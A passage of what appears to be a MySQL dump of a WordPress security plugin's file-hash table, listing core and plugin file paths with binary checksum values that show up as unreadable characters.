1��А々�S:(','wp-includes/js/thickbox/loadingAnimation.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"h\r�c���&�','B�F���`�F-��l�ڛ�RT6���Յ��','',0,'?'),('�\r�W$2lv9{ܭ:��','wp-includes/blocks/post-title/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4�̈~�3�vtSQ\'','�g�e��T����\'i\\��i��=>;�QBH\'D��','',0,'?'),('�w:k@D�i�WQ�','wp-content/plugins/wordfence/lib/wfModuleController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oI�Ʒk���b','7.ݰ̿���U���L>�\"�TM5�]��>�','',0,'?'),('���\Z�V���տ','wp-content/plugins/wp-cerber/cerber-maintenance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�69SH\nƻ��/��(�','�(c%��vW�S�xEuς><���¶�Ȯ[� ','',0,'?'),('�T���!ة7�l��<','wp-includes/js/codemirror/htmlhint-kses.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��k[�#cLf{','�N��&�V\Z�A��/��R#~բ���_J*�Ї','',0,'?'),('�\\���ntk�D�\'E','wp-content/plugins/wordfence/css/wf-ionicons.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Al��s���j�⯃','ג��4�ˮ�v�����M�`�V��Z�','',0,'?'),('�_���jSX�2�QQ=','wp-includes/ms-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�),l�\"��?�V�?%','���#~���&�S@�]�ED}L*�#5+\r�','',0,'?'),('�`~|D%EH�wO����','wp-includes/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Ǭ��� ���','�7�.{��=�5�A�~�\r~.A(0Z��Q�2�','',0,'?'),('ÂuJ�M�/� w�y','wp-includes/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p{��[��˔�	','�9�o���G�f�pmeG�#`�:Q�{`�','',0,'?'),('ä��]0�`���AS:D','wp-includes/js/dist/blob.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����J���|�M��h','�烃6&�l圂K�\r�1��\"��x�ȕf,','',0,'?'),('ý��P��7&ݣ`�)','wp-includes/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Υ\ZBab�_ƺ�01Q','\n����譂:|���D�g�����DU�\r�=','',0,'?'),('�Ĩ�|�������','wp-content/plugins/redirection/locale/json/redirection-fr_CA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���yB=�� �*��','l]�3\"Bm��9��af���m�,�}\r�`<qC','',0,'?'),('��tnR�ؔ����%^�','wp-admin/images/align-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���Oe#�l@:P+\"v','�ɳ���C��?�=���&��UyZ�31��!<c','',0,'?'),('���5�V\"�$$�_��','wp-admin/includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','վ���z�\01�','	5B׭�HR���էF���q��\"��?</�VyG','',0,'?'),('��4�l!�r��؄���','wp-includes/class-wp-block-type-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P0�X��o�\\[�','�	�OmR#����%$�6\nLlt�e�#cRi�E(U','',0,'?'),('��iY����\0\nR)��','wp-includes/post-thumbnail-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d��V��cꘄ','G�%*�J	���$��o=�@��k����Jl�','',0,'?'),('��u�X�ݼ#�-���','wp-includes/class-wp-http-ixr-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����2���5K','�BVrAC\n�a�+���(�;%�FdC��TD�#��','',0,'?'),('�\0U�����aS��','wp-includes/widgets/class-wp-widget-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�Q�Z�p�Q׷2	','�;����A��!����uRW�����s��','',0,'?'),('��5Ĩ)�0��X�\'�','wp-admin/widgets-form-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0���JSL*^?��','���Z���?Y\nR4ƹ�4�\0֡��Ӂ]��','',0,'?'),('�#C��v�nОKvz��','wp-content/plugins/wp-cerber/assets/icons/fonts/crb.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r����R�EB','���/\Z�\0Sam\'���ϫ�k!f��5�\rM�','',0,'?'),('�`�,}��D��@','wp-includes/class-wp-recovery-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �oxц��<N��','�4>���\r�	j����s�dqm��H��l�7�~��','',0,'?'),('�v�V/W��{}!^�N','wp-includes/blocks/html/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\"�r`g�����','���5��>��/�ˏ�z�h����!�d�}a','',0,'?'),('Ć~�7c���Ʊ�ۃG','wp-content/plugins/wp-cerber/languages/wp-cerber-lt_LT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��:rל�ZL]���','��qA$%Re��$��e���`!�e:|��PB;�','',0,'?'),('Ĉ^A��+l���o�d��','wp-includes/js/tinymce/skins/wordpress/images/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7~!���\0����\"w','�g��z���.g�V�:��[����Й�H)Ȟ�','',0,'?'),('ĔԼ���pP�Z	H��','wp-includes/images/smilies/icon_cry.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+`Ůd�W]�����h','[�<�q�wf�)�rZ�(���=#;ans���w9','',0,'?'),('ě�w��+�qAZ','wp-includes/blocks/group/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c����~tк㺼\'','��R<g�\")���b����z�:��OqS󘚘','',0,'?'),('ijJ�\n`|�5,HT��','wp-admin/includes/admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƸJ�Ґ��F0�����','��\r&�+;�U(�x��w�}�J�-�U���','',0,'?'),('Ķ�Ɩ�o���èf{U','wp-includes/js/jquery/ui/effect-highlight.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n+)�����I�L\r�','qp��G%�S���V���9|�����@S�Xn','',0,'?'),('��e��N-��@1\Z��','wp-includes/blocks/legacy-widget/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�v�^E�E�A','�}2��k\0���h�dz!u��5��ޭgd�c�','',0,'?'),('�Ѻɩ��uy����}','wp-includes/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b5lJ�#���v','c=0�-#�-T�S�X�&��4����\0�K8\r�','',0,'?'),('��ʙ\0}��甠K��.�','wp-includes/js/jquery/jquery.color.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rq�*X�gq�O�(͈','�x�2���<���k���Qݯ�����{��','',0,'?'),('��{A��mm��*�K','wp-includes/nav-menu-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JI1E%g䅝�?�&�','AS%�³�[�|ZJf�RH3#Bl�K��zH','',0,'?'),('�D���C����F}��','wp-includes/Requests/Exception/HTTP/418.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','83�9k\\8\'i�v��','4 �6鎬��M&�$!�2d<��\\	|\\�?g�\n','',0,'?'),('�_�n�����p���aV','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>*L�1�˵�\"k%F�+','Z��i�M�f�U�v�i-�})��f�\"��Mnd?X','',0,'?'),('�`#��G�b�C��֊�','wp-includes/js/swfupload/handlers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��ڙK�~q	����c=','�T򌿑�d�T�y~#��jI\"�+�+3�ɉ','',0,'?'),('�xeju������','wp-includes/css/dist/edit-widgets/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�x_�cpv���\Z','m$��S�t���|�,T�(���q��mx�ֻ\n','',0,'?'),('�~�H�����c','wp-content/plugins/redirection/database/schema/201.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Zղ�Z�I}C','���Tȍ�~���)�yr������b�','',0,'?'),('łj�Dߋ�.�˖D��','wp-admin/css/forms.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H���r�:�.��','o�D�m�p�[79���{-��i���j�L�','',0,'?'),('ņ�ԡyi�D�1�','wp-includes/blocks/embed/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Jώ��_�~��ə�Q�','��	�\r�Q?*�϶b��o�\\��6i?���','',0,'?'),('Ŋ��6���@�L(`��','wp-content/plugins/wordfence/views/scanner/site-cleaning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_d�+W��.������','��y>Ȅ9&��\0oxB�~�j3#7걊l��>3','',0,'?'),('Ŝ�\0�>j�-������','wp-includes/blocks/latest-comments/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','琌U�~�P��(�k','V�3=%��kO�[3��Nf3��S�0v�ڦ','',0,'?'),('że�����E@}-�','wp-content/plugins/wp-cerber/assets/flags/ss.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��-�p�lE���k�/�','wp-includes/js/jquery/jquery.hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S!}EU�\\b�g�h��=','\ZJ��]�x ծT���c�0n�9  +V�k�','',0,'?'),('��A#����Uu�O���','wp-content/plugins/wp-cerber/assets/flags/sk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I�q!-�\"�jU]P','��!$�2�E@��e�K���z\\�x�<GF�	','',0,'?'),('�v�T!)��aH�','wp-content/plugins/wp-cerber/assets/flags/mq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���zs�׳Wh���','����J���U2V\\��h�Ѧ�Z�t/���Q','',0,'?'),('�ZTD�\r�[��FcLL�','wp-includes/blocks/gallery/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\\p������7$�E','\Z��(?\r�\0,��J�n�]��U@�\0��s�G�','',0,'?'),('�	��#A�\n#b#��=','wp-includes/js/tinymce/themes/inlite/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z=\ro<3��E���','�\"�;l��\0s\'�lB�3q�6)�8�\n@D����','',0,'?'),('��p�1	�?��J@�','wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ǧn3Q�2�G�','�d��\"fݎ���6em�`�z����P<KO�','',0,'?'),('�+���g���q6�^\0�','wp-admin/images/wheel.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E0� q0m��\ZY%V�X�','(]�:=d�qۅ�O{9�€Ԁ�v��Ș~����','',0,'?'),('�+�kZ@�bK��Қ��','wp-includes/blocks/block/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���F�q���6���V�','�,�����htD�)WMF�4���~\r��','',0,'?'),('�@��:<�o|J-e�','wp-content/plugins/wordfence/images/wf-error-badge.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EQt��s	�Mz�y���','��殙F��`�a�݀�k���mE�Q��+~��','',0,'?'),('�dt���S0�[\\Og:','wp-content/plugins/wordfence/modules/login-security/views/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�a�b�vr�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('ƅ����|_�i/y��	','wp-includes/js/tinymce/plugins/media/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�\'1�Z����f ','\n�>����EQ�i�漺��k�}î�Dz������','',0,'?'),('Ət���\Z��o+��ش','wp-includes/blocks/spacer/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�k���k�3z��U)�','u2�T��z\"����-g���&]�V�j��$O>�','',0,'?'),('Ƭ+\Z���I�d^i <\0','wp-includes/js/jquery/suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':$tV�E�ʿ���','r�,K�pŗrq^b�\\��=rZ�]��6�+','',0,'?'),('Ƭ��SX���Z���3�','wp-includes/js/dist/plugins.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z��gx��.S�\0�','}<5���r������V�����m�H�dt','',0,'?'),('����;Vޯ���n�Ty ','wp-includes/class-wp-theme-json-resolver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5��\06�^tQ�:','����BRH�:mx��ʵ�!\0�����{��I','',0,'?'),('���yw�-p��`�)','wp-content/plugins/wp-cerber/assets/flags/cd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��E�\0{+k�`֚o','bf&<�9�\nTĔ��n��\Z~�\Z,����!��','',0,'?'),('�몳@� �=��y`','wp-content/plugins/wordfence/views/options/options-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۘ���j玓݆E','��Kxf�������+eǖ٭�ʌ����m','',0,'?'),('�͌%+�e�@uQ(�','wp-includes/js/dist/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v:��	���-ܻ�','��1+�:��[��T&q�v�H������G','',0,'?'),('�W}\rDŬ�w��*��','wp-includes/blocks/query-pagination-next/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�‹b}�@�߹e�#','`�x\"��cwc�*\r��2`w�f(w�K\0','',0,'?'),('�w����u�]�tF���\"','wp-content/plugins/wordfence/js/admin.ajaxWatcher.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N����ů)������','�\'�v�ᦸ� =���\'X�k��<6YS�t�','',0,'?'),('ǂ-i)�.�\\���z�^a','wp-includes/Text/Diff/Engine/shell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�����?��z&','�=5��:Pu\'pM�N[�9^�m>z@','',0,'?'),('Dž�9��9:���\Z�','wp-includes/cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��V��O��yDv� !','{�d���<>wb�S�q����B������','',0,'?'),('dž_5�2�߱�c�ƫ','wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�vm_��I��\\����','\r��鋕��1(���p�KH�KBY����eB','',0,'?'),('ǝ�^�x�JB\Z�3-�6','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��5]{\"���V�','�C�Jr~W�OY�*[�:[j)���G�Є�e�','',0,'?'),('Ǥ>z�Ԅ��!J]>','wp-includes/css/wp-auth-check-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�P��KN��zj��K','V<e�b��(�k��I��2�\ZÜu�/#4Ɇmz','',0,'?'),('ǫ�=��m�/���^','wp-admin/includes/schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�rwjb���\\��i�','A����-{�4{���1&�M�+��]@�c�Ͱ�','',0,'?'),('ǭj�߃�;4��*','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-debug-logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�`�p.�Zb �x3I','#O)r�a�%�����r�2tK�P��1��kw��','',0,'?'),('dz\\��_L-Y�Ō%$','wp-includes/ID3/module.audio.dts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�llA�2���̋�','\Z�aH���r���%A���6$`Hu�T�6y�4�','',0,'?'),('��w��y�*�X�O\nG��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�Vl~�m[%Wt','P�q\0������V{|�0m\0;���2�f@U�','',0,'?'),('��}�C�wX�TC��','wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('�\Z{g�?�3gڢ\Z�','wp-admin/images/icons32-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�*�����g����','�#!$��@�0g�.�;i3%!�cHP���=','',0,'?'),('��fp��\0!�tDK','wp-admin/js/code-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�\'߽	�%���','��-�Bd/�`��\\V�x6Y*��-$����W','',0,'?'),('�\"u@��T��S��5�','wp-includes/images/smilies/icon_idea.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<]�W3tށ�','�{�2^4S����Tl���I�J�Q��\"','',0,'?'),('�7�\0��tt��.','wp-content/plugins/wordfence/views/dashboard/status-renewing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hwB���e (���','���^K$���1\0�nƄ&�iM{�$�^�h�','',0,'?'),('�8����R�6>G\"���','wp-includes/js/dist/element.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z,\r��C���Eqơ�','G��=��l��t�&��YA�@ӫ�%�N�V�','',0,'?'),('�;����N�Q>���','wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5>�\Z�!�̄�����','\"`\n��2Zgo�j1�p�hG)M�O�Ya�\rci@G','',0,'?'),('�Y$\'����o���','wp-includes/css/wp-auth-check-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���jv�sZ��ܻ&h�','F�V=&G\"�r��\rF�p��\nJ�ݣ�=՟3�','',0,'?'),('�[���tD cK��3','wp-content/plugins/wordfence/css/jquery-ui.structure.min.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�/��h<��U��','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('�u��C~7\n���W�e�','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H����k-x��f�C/','�q�~xY�\Zk����o�ϫ�(NS�B���','',0,'?'),('ȁ��#/�\0��6','wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2A�tz`�n%��YP�','�����\\�1��[��Z�>EK��Rk��W\\�v�','',0,'?'),('ȋ�uN��1�c�7','wp-content/plugins/redirection/api/api-plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�[p���\nd�CC G','a�T\'E}��0�CNE��H��`^��$7','',0,'?'),('ȍP�� �3����\n��','wp-includes/class-wp-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|w�	�vi͔���cư','�b�L��]�V�mhH8�Z.c�幊�8?�\n','',0,'?'),('ȣ�gӰ�DZCs��','wp-content/plugins/wp-cerber/assets/flags/cs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qȥ�`�����','���3�#�xUN�^�[ ^�1�a�֌�GX9PP','',0,'?'),('ȿ�-��`�u���o��','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�m;S��V#��m�I','�R9F��������47i}�ʧ��C^�%','',0,'?'),('�����~\r\ZK4(#��','wp-admin/user/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(팋�#��A���;�','�u�A���+I/�㊓\0�n�N�1G8�\ZD-�','',0,'?'),('�!�`�L�i\0Ը�u','wp-content/plugins/wp-cerber/assets/flags/mf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�5�iD�hI�6�;','wp-includes/SimplePie/Cache/Memcached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\'Xlab��4`','?O�d6�C���u���>Jr��h�t����e���','',0,'?'),('�7ŭ����OE6','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filesystem-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�tg��q�O1�0�','�Džg�L���)�Q�r���ty�jX��O�\n�&	�','',0,'?'),('�A7�\'�C#�w�S�s�','wp-admin/css/about.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����٬w��$�SJ','%l��v3�����,f���6�.�Z��D�h�','',0,'?'),('�lX�w��B�*X�W�','wp-content/plugins/wordfence/images/sort_asc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oɧ��*�X���9e','�v�\Z�|5.YX ������Z�鹁Ź','',0,'?'),('Ɇ8���pŻѵV�','wp-content/plugins/wordfence/lib/wfActivityReport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/}��U�G+��','\'o�w�,X^�x���(���*����/�T?�a�','',0,'?'),('ɡʧ~����.)k','wp-admin/includes/class-custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l�?�w.&.��ܒ�','r�^(k�xQ)�d����X�\Z��8�H����','',0,'?'),('�����2D�i�e�','wp-admin/css/l10n.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ĸ�P)�|��q�r���','wppS���\"�D�.��o�MO�m�O�\'b�aNj0','',0,'?'),('������h&�\'s','wp-includes/blocks/search/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\Z��V6}r��^���','|dV�X�P7:���L!{Nd.5A�TP��%�$','',0,'?'),('�ͤ� �T���-�','wp-content/plugins/wp-cerber/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=v����]���V','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('� ���tdrlPj','wp-includes/css/dist/widgets/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��*/NU��I^|��','@����1����G\Z�ej�Z�Nr.�G�–','',0,'?'),('�(�q�4P�}�5Oz�k','wp-admin/js/inline-edit-tax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_���h�A?���D','��LZ�V(j��0�~�\Z3u�)��ztef\n���O','',0,'?'),('�L�t/�\Z�I��I�','wp-content/plugins/redirection/locale/json/redirection-pt_BR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��d�-�Y����M��','*�c�	vl���ϧn���y��}\Z?\0I�,','',0,'?'),('�R���ш�޿�0','wp-admin/css/themes.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#1志$\0���g+iV�','�\'y��,(�,+����N6J�\nU<�pWk��','',0,'?'),('�hFM<@`%q-��','wp-admin/includes/class-wp-filesystem-direct.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�:Ca<�y�g�','�f��!�����O.�e�}E�y�3g�����H_','',0,'?'),('�r��{�\Zk��\"��k','wp-admin/css/site-health-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0 ����څ���\n�','�뙨�����x����WpS^�[�7��V�q��','',0,'?'),('�xjP����!c�x','wp-admin/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�*���#��_��ҳZ�','�����f��uG#����\'��_ً�:�F�A','',0,'?'),('ʊ�2�%�+a_��LF','wp-includes/blocks/columns/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�\rc���p���$','$0��*���ں�·�%��Z8k!~X��͖�','',0,'?'),('���W�>�ҟ����[','wp-includes/Requests/Exception/HTTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ųٞh�X�r~n�f','o�E²tQQbo\n����r�Qq��\"�/����','',0,'?'),('�܆R(�\'2Whp���G','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ҏH��C�5̨[\0��','�X��f:�M�t�˃#��sD�4(�NG�F�','',0,'?'),('��	b���8�[����y','wp-includes/js/wp-emoji-release.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��o���c�\\�ܘ','Q�d�:����[U4&&;J�ͽg��r���V�','',0,'?'),('�㱛��� V9�{��b','wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��Jnw��8z2�swa','�u<�O�8Be\'O�b\0y�PJ�x7���I�','',0,'?'),('��O忯uR��c�[j','wp-includes/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[cl�r�u�	�Сu^','6p��\'`�+*[AG�4�����^6Ŋ��%�C','',0,'?'),('�!��#��I|���F�','wp-includes/js/tinymce/plugins/directionality/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�\"�X	& )��=ʀ$','�&�[�@��5��(��cv��L��YI6�B;)-','',0,'?'),('�5V�x�,$�>7d�k�','wp-includes/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڸb��9����M','�F�/\'���M%�9�}@��fW�>��S*�m','',0,'?'),('�6�<��C�﮿�V:(r','wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�be& W����Ř�','Iu{W�m�bk_�����.�cx\rh+K�','',0,'?'),('�R���<%��݌�D-�','wp-content/plugins/wp-cerber/assets/flags/co.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@]�\"^��K0��eu>','=Ө�Ĺ^ٜn�_?���*`������s�<�;2','',0,'?'),('�U<�?Y,����ػ(','wp-admin/js/svg-painter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�Pr�u6�<jsF&��','�W�Q�V��\ZA�6�In�_G��ɻ܀�Ԓ�l','',0,'?'),('�U��}�B��	Js��','wp-includes/class-wp-object-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n̩$�������/V','���O�\Zm7l���W���2��m�_/2��$�','',0,'?'),('�q�8�]C���֔�','wp-content/plugins/wordfence/modules/login-security/views/common/reset-grace-period.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6�Ϝ�{��/�y','��?a��d&�.�ɖ�����q�V$��Md','',0,'?'),('�y�6�6l�M�C�','wp-content/plugins/wordfence/views/waf/firewall-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&\n�U�����ή�,','�SS,�|l��j��=� F\'ퟝ6mgDGs�','',0,'?'),('�|G��$���k���','wp-includes/js/dist/vendor/wp-polyfill-url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>d�KP\'IC��3��8','�k��z��:�_sDp�xe%J�	���ST�_','',0,'?'),('�}Ua&gl��i�)���!','wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','õ�E�����i�','O�X���b�Np����=)8�,�O��[K','',0,'?'),('ˆ]g�1{[	�pe�','wp-includes/blocks/video/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/cO��A���q��a','���xѭ�\Z�V�P��s�b�s҂�υ�l(A','',0,'?'),('ˍ�G䯀oe���o�','wp-includes/js/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�������P}�SΊ','yae�aK��R�\0%��xy��u�y�↢','',0,'?'),('ˤԐ�{%k�#�f�','wp-includes/js/mediaelement/wp-playlist.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����3|G^�cKT\"�','\'�e\"ʌ�_(n��f��ww�\Z�N�2�+ ','',0,'?'),('�ǝ��Q��_y�d��+�','wp-includes/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��U iU0�ll9�c','��_�v$�U7_�*\r?�+�^��≾�Ā','',0,'?'),('���N��\0��ܹ�t','wp-includes/js/jquery/ui/spinner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8��TXi�M�Y�','�>�qJط���0� 